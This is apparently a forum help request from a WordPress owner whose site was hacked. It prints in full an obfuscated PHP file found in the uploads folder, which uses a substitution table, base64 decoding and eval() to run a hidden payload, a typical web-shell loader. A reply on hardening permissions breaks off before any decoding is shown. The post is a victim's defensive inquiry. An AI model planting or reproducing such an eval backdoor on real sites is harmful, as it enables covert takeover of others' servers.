i have a wordpress website and recently my site was hacked and after checking that i saw a file name sql.php in my wordpress upload forlder, and the php code was encoded . I already removed that php file , but now i want to know what is the file about ? why they put it on my website and how i decode it to know what php command is written here..
sql.php file code is below :
function ivq($duss, $djw) {
$naon = '';
for ($i = 0;$i < strlen($duss);$i++) {
$naon.= isset($djw[$duss[$i]]) ? $djw[$duss[$i]] : $duss[$i];
$nbkgehdymn = "base64_decode";
return $nbkgehdymn($naon);
$zkahl = 'OBLNqX2Ip1OM6sXxr92x1sVKpxrADPYXgPJf5JfCqQYf1HdLtivGzB2G1sXxr92xrxrADuCf5JfCqQYf1HdLtivGzQ' . '8T1sXTpQdetBLKzL23qQeL6xJvFi7ai7hIp1ZStBLbpX2AqQeftivJl' . 'gAli9L9lBLIrsX3liZSW3XmX7Xmlm7ljJM6682gZX6QZX6z6eh' . 'DW82gZWVB6e3v4mC0kxDaDCM6682gZX6QZX6z6e68gW2WZX2hZPZm6e3v4mC0FgDHkRCNFiTVDRAliQL9li8' . 'Lz1h3jmv71ed8WLp8WLAGm8ZWW82E13p4WLthW7Z8Z82BgeDG1m7fivLaiv76682gZX6QZX6z63UWX8' . '1XA0E06tDu3v6B6UpuAli16LtnXxz0h0E1dLdRZSpQYRzsZLlndLr9LUzBLypmv' . '7r9XIlm7aiG3=';
$viici = Array('1' => 'X', '0' => 'i', '3' => '0', '2' => '9', '5' => 'O', '4' => 'P', '7' => 'k', '6' => 'J', '9' => 'm', '8' => 'F', 'A' => 's', 'C' => 'A', 'B' => 'G', 'E' => 'Y', 'D' => 'I', 'G' => 'n', 'F' => 'M', 'I' => 'z', 'H' => '3', 'K' => 'v', 'J' => 'w', 'M' => 'o', 'L' => 'l', 'O' => 'Q', 'N' => 'u', 'Q' => 'W', 'P' => 'E', 'S' => 'f', 'R' => 'j', 'U' => 'h', 'T' => '4', 'W' => 'U', 'V' => 'x', 'Y' => '5', 'X' => 'V', 'Z' => 'R', 'a' => '7', 'c' => '8', 'b' => 't', 'e' => '1', 'd' => 'N', 'g' => 'T', 'f' => 'p', 'i' => 'C', 'h' => 'B', 'k' => 'L', 'j' => 'e', 'm' => 'S', 'l' => 'K', 'o' => 'r', 'n' => 'H', 'q' => 'a', 'p' => 'Z', 's' => '2', 'r' => 'c', 'u' => 'D', 't' => 'd', 'w' => 'q', 'v' => 'g', 'y' => '6', 'x' => 'y', 'z' => 'b');
eval(ivq($zkahl, $viici)); ?>
Pls help me anyone…
Hackers may have some
Encryption Hash key
to encrypt.You should not give
permission or write permission for your uploader folder. Restrict it.I tried decoding and it evaluated to this code